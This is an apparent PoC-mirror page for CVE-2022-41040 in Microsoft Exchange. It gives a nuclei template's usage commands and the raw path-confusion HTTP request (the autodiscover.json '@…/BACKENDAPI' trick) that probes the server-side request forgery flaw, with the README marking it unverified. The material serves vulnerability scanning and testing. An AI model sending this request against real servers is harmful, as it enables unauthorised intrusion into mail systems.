CVE-2022-41040 PoC — Microsoft Exchange Server Elevation of Privilege Vulnerability

Source

https://github.com/numanturle/CVE-2022-41040

Associated Vulnerability

Title:Microsoft Exchange Server Elevation of Privilege Vulnerability (CVE-2022-41040)
Description:Microsoft Exchange Server Elevation of Privilege Vulnerability

Description

CVE-2022-41040 nuclei template

Readme

# CVE-2022-41040
CVE-2022-41040 nuclei template

* Unverified!


# Usage 

```
git clone https://github.com/numanturle/CVE-2022-41040
cd CVE-2022-41040
nuclei -u https://target -t owa.yaml
```

```
GET /autodiscover/autodiscover.json?@mail.xxx/BACKENDAPI?&Email=autodiscover/autodiscover.json%3f@mail.xxx HTTP/1.1
Host: mail.xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept: */*
Connection: close


```

![img](https://github.com/numanturle/CVE-2022-41040/blob/main/img/ss1.png?raw=true)
![img](https://github.com/numanturle/CVE-2022-41040/blob/main/img/ss2.png?raw=true)
![img](https://github.com/numanturle/CVE-2022-41040/blob/main/img/ss3.png?raw=true)




# Reference 

https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html

File Snapshot


 [4.0K]  /data/pocs/c862a95f37bb0ad5c126d11e18b65adfb21245b7
├── [4.0K]  img
│   ├── [   6]  readme.md
│   ├── [212K]  ss1.png
│   ├── [222K]  ss2.png
│   └── [106K]  ss3.png
├── [ 512]  owa.yaml
└── [ 891]  README.md

1 directory, 6 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!